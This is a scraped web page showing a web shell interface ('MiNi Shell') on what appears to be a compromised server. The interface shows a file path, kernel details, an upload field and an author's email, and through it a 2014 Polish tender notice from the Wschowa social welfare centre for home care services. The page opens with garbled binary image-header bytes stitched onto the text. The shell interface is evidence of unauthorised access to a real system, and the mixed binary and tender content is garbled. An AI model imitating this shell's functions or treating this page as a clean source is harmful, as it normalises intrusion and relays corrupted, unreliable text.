JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140926/319436-N-2014.html

<p class="kh_header"><b>Wschowa: Świadczenie usług opiekuńczych w latach 2015-2016 
na rzecz klientów  Ośrodka Pomocy Społecznej we Wschowie</b><br>
<b>Numer ogłoszenia: 319436 - 2014; data zamieszczenia: 26.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Klasztorna 3, 67-400 Wschowa, woj. lubuskie, tel. 65 5402525, faks 65 5404898.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.ops.wschowa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług opiekuńczych w latach 2015-2016 
na rzecz klientów  Ośrodka Pomocy Społecznej we Wschowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług opiekuńczych w latach  2015-2016, na rzecz klientów Ośrodka Pomocy Społecznej we Wschowie,  którzy z powodu choroby, wieku lub innych przyczyn nie są w stanie zaspokoić codziennych potrzeb życiowych, opieki higienicznej oraz kontaktów z otoczeniem.
2.	Zakres zamówienia: 
a)	zamówienie obejmuje usługi wchodzące w zakres świadczeń pomocy społecznej określonych w art. 50 ustawy z dnia 12 marca 2004 r. o pomocy społecznej 
b)	świadczeniem usług będą objęte osoby z terenu miasta i gminy Wschowa,       w oparciu o decyzje administracyjne wydane przez  Zamawiającego ; 
c)	miejsce świadczenia usług - miejsce zamieszkania -dom, mieszkanie, świadczeniobiorców na obszarze miasta i gminy Wschowa.
a)	usługi opiekuńcze wykonywane będą przez siedem dni w tygodniu, w tym         w niedziele i święta, w godzinach od 7:00 do 20:00. Dopuszcza się również konieczność zapewnienia dyżuru poza wskazanymi godzinami.
b)	szacunkowa określona przez Zamawiającego liczba godzin usług opiekuńczych - do 2600 godzin miesięcznie, do 31 200 godzin rocznie.
c)	szacunkowa określona przez Zamawiającego liczba godzin usług opiekuńczych w czasie trwania umowy - do 62 400 godzin.
4.	Wykonawca winien zapewnić na terenie miasta Wschowy najpóźniej do dnia rozpoczęcia realizacji umowy biuro obsługi, odpowiednio wyposażone  co najmniej w telefon, fax. i komputer z niezbędnym oprogramowaniem.
5.	W trakcie realizacji przedmiotu zamówienia Wykonawca winien zapewnić stały kontakt telefoniczny i faksowy, w godzinach pracy Zamawiającego 
z upoważnionym pracownikiem Wykonawcy.
6.	Wykonawca zobowiązany będzie do bieżącej kontroli jakości świadczonych usług w miejscu ich wykonywania.
7.	Wykonawca zobowiązany będzie udostępnić na każde żądanie Zamawiającego
aktualny wykaz zatrudnionych osób, a także przedstawić dokumenty potwierdzające ich kwalifikacje, stan zdrowia oraz niekaralność.
8.	Wykonawca zobowiązany będzie niezwłocznie poinformować Zamawiającego na
piśmie o każdej zmianie życiowej i zdrowotnej osoby korzystającej z usług,  która mogłaby mieć wpływ na ich realizację  tj. rezygnację z usług, wyjazd, pobyt w szpitalu, zamieszkanie w domu pomocy, zmiana miejsca zamieszkania itp.,
9.	Z uwagi na specyfikę przedmiotu zamówienia Zamawiający nie dopuszcza możliwość zlecenia części lub całości zamówienia podwykonawcom.  
10.	Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających,  o których mowa w art.67 ust.1 pkt.6 ustawy.

OPIS PRZEDMIOTU ZAMÓWIENIA

Zakres usług opiekuńczych obejmuje:

1. Zaspokojenie codziennych potrzeb życiowych do których należy zaliczyć:

a.  utrzymanie czystości w pomieszczeniu mieszkalnym i użytkowym z którego korzysta  
     osoba objęta pomocą a także sprzętu i urządzeń sanitarnych,
b.  zapewnienie bezpiecznego poruszania się w miejscu pobytu lub zamieszkania,
c.  utrzymanie w bieżącej czystości naczyń kuchennych, sprzętu gospodarstwa domowego, 
     dbanie o higienę żywności,
d.  pranie bielizny osobistej, odzieży, ścierek i ręczników,
e.  pranie bielizny pościelowej -pod warunkiem posiadania pralki-lub zanoszenie bielizny  do pralni,
f.  prasowanie odzieży,
g. zakup leków, podstawowych artykułów spożywczych i gospodarstwa domowego,
    pomoc przy sporządzaniu listy zakupów, informowanie o cenach towarów, usług 
    pralniczych itp. a następnie bieżące rozliczanie się z osobą objętą pomocą. 
h. przygotowywanie posiłków, uwzględniających zalecone diety lub dostarczanie jednego     gorącego posiłku z punktu zbiorowego żywienia, udzielanie pomocy przy jego     spożywaniu,
i.  zmiany bielizny pościelowej,
j.  przynoszenie węgla, drzewa, palenie w piecu, 
k.  przynoszenie wody,
l.  załatwianie pilnych spraw urzędowych i terminowe opłacanie zobowiązań finansowych,
ł.  organizowanie spacerów, podtrzymywanie kontaktów ze środowiskiem lokalnym,
m. pomoc przy opiece nad zwierzętami domowymi,
n. troska o fizyczne zabezpieczenie mienia i bezpieczeństwo osoby.

2.  Zapewnienie podstawowej opieki higieniczno - medycznej, a mianowicie:
a. kąpanie, mycie, czesanie, ubieranie z uwzględnieniem problemów utrzymania higieny   osobistej przy załatwianiu potrzeb fizjologicznych,
b. układanie chorego w odpowiednio przygotowanym łóżku,
c. zapobieganie powstawaniu odleżyn,
d. wykonywanie czynności pielęgnacyjnych zaleconych przez lekarza, podawanie leków, smarowanie, okłady - zamawianie wizyt lekarskich,
e. utrzymywanie niezbędnego kontaktu z lekarzem, bezzwłoczne reagowanie w przypadku pogorszenia się stanu zdrowia.

3. Wykonywanie innych czynności zleconych przez pracodawcę.
4. Miejscem świadczenia usług opiekuńczych jest stałe miejsce zamieszkania lub czasowego pobytu osoby której przyznano pomoc w zakresie usług opiekuńczych.
5. W przypadku rozwiązania umowy o pracę z opiekunką domową pracodawca jest zobowiązany sprawdzić czy opiekunka rozliczyła się z podopiecznym z pieniędzy pobranych na zakupy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.00.00.00-9, 85.31.12.00-4, 85.31.11.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga, aby każda oferta była zabezpieczona wadium w wysokości:
5.000,00 zł  słownie złotych: pięć tysięcy 00/100.
2.	Wadium może być wniesione w formach przewidzianych w art.45 ust.6 ustawy z dnia 29 stycznia 2004r.  - Prawo zamówień publicznych, a mianowicie:
-	pieniądzu
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
-	gwarancjach bankowych
-	gwarancjach ubezpieczeniowych
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt.2 ustawy z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości

3.	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.	Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank Spółdzielczy we Wschowie  Nr 43 8669 0001 0008 7564 2000 0001   z dopiskiem - Wadium przetargowe na świadczenie usług opiekuńczych w latach 2015-2016 na rzecz klientów Ośrodka Pomocy Społecznej we Wschowie
W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
5.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w siedzibie Zamawiającego - Ośrodek Pomocy Społecznej we Wschowie ul. Klasztorna 3, pok. nr 9 lub dołączyć do oferty.
6.	Z treści gwarancji  musi jednoznacznie wynikać jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego  przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny -z podaniem imienia  i nazwiska. Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
7.	Wadium musi zabezpieczać ofertę przez cały okres związania ofertą  licząc od dnia upływu terminu składania ofert 
8.	Wykonawca, który nie wniesie wadium w sposób określony w SIWZ zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
9.	Zwrot wadium nastąpi zgodnie z zasadami określonymi w art.46 ustawy Prawo zamówień publicznych.
10.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie o uzupełnienie dokumentów lub oświadczeń, o których mowa w art.26 ust.3 ustawy, nie złożył ich, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11.	Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art.46 ust.4a ustawy.
12.	Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli było wymagane.
13.	Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14.	Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza, traci wadium wraz  z odsetkami na rzecz Zamawiającego, w szczególności, jeżeli:
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
-	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe          z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenie w sprawie spełniania warunków art.22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - co najmniej jedną usługę tożsamą z przedmiotem niniejszego zamówienia, polegającą na świadczeniu w sposób ciągły usług opiekuńczych grupie powyżej 40 osób, trwającą nieprzerwanie przez okres co najmniej 
12 miesięcy.
Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o informacje zawarte w złożonym przez wykonawcę w niniejszym postępowaniu wykazie wykonanych usług - załącznik nr 3 do oferty ( wykaz usług odpowiadających swoim rodzajem usługom, stanowiącym przedmiot zamówienia, z podaniem ich wartości rodzaju, dat wykonania i odbiorców) wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu oświadczenie w sprawie spełniania warunków art.22 ust.1 ustawy.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli Wykonawca oświadczy, że: 
a.	dysponuje jedną osobą pełniącą funkcję kierownika biura, mającą co najmniej roczne doświadczenie w zarządzaniu usługami o podobnych charakterze i zakresie. 
b.	posiada  minimum 15-tu pracowników na stanowisku opiekuna, gwarantującymi terminowe i profesjonalne wykonanie usług przewidzianych w zamówieniu, z wykształceniem przynajmniej podstawowym, nie karane, przeszkolone w zakresie sprawowania opieki nad chorym w domu lub opieki nad osobami starszymi, znające procedury wzywania pomocy i udzielania pierwszej pomocy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek dotyczący sytuacji ekonomicznej i finansowej będzie spełniony, jeżeli Wykonawca udokumentuje, że jest ubezpieczony
od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę równą lub wyższą  niż 100 000,00 zł.

Ocena spełnienia wyżej opisanego warunku udziału w postępowaniu dokonywana będzie w oparciu o złożone przez wykonawcę w niniejszym postępowaniu dokumenty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie Wykonawcy, że w przypadku dokonania wyboru jego oferty jako najkorzystniejszej, najpóźniej do dnia rozpoczęcia realizacji umowy zapewni na terenie miasta Wschowy biuro obsługi.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie  leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W takim wypadku Wykonawca może żądać wyłącznie wynagrodzenia należnego mu z tytułu wykonania części umowy.
2.	Zamawiający ustala, iż zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, z zastrzeżeniem art.144 ust.1 ustawy, może mieć również miejsce w następujących sytuacjach:
a.	w przypadku zmiany potrzeb wynikających z rozpoznania środowiska, bądź zmiany zabezpieczenia finansowego na realizację usług objętych zamówieniem, a także zmiany ilości świadczeniobiorców,
b.	w przypadku wystąpienia różnicy pomiędzy wartością usług wynikającą z oferty Wykonawcy, a wartością faktycznie wykonanych usług potwierdzonych stosownymi dokumentami;
c.	w przypadku ustawowej zmiany stawki podatku od towarów i usług.
3. W przypadkach, o których mowa w pkt. 1 i 2 Zamawiający może:
a.	dokonać rozliczenia na podstawie sprawdzonej i zatwierdzonej przez zamawiającego dokumentacji faktycznie wykonanych świadczeń; 
b.	dokonać rozliczenia cząstkowego za wykonany zakres usług;
c.	dokonać zmiany ceny jednostkowej brutto za 1 godzinę usługi opiekuńczej, 
dodając do ceny netto obowiązującą stawkę podatku VAT;
d.	zmienić kwotę podatku VAT i kwotę brutto wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ops.wschowa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej we Wschowie
ul. Klasztorna 3
67-400 Wschowa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2014 godzina 09:00, miejsce: Ośrodek Pomocy Społecznej we Wschowie
ul. Klasztorna 3
67-400 Wschowa- I piętro- pokój nr 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com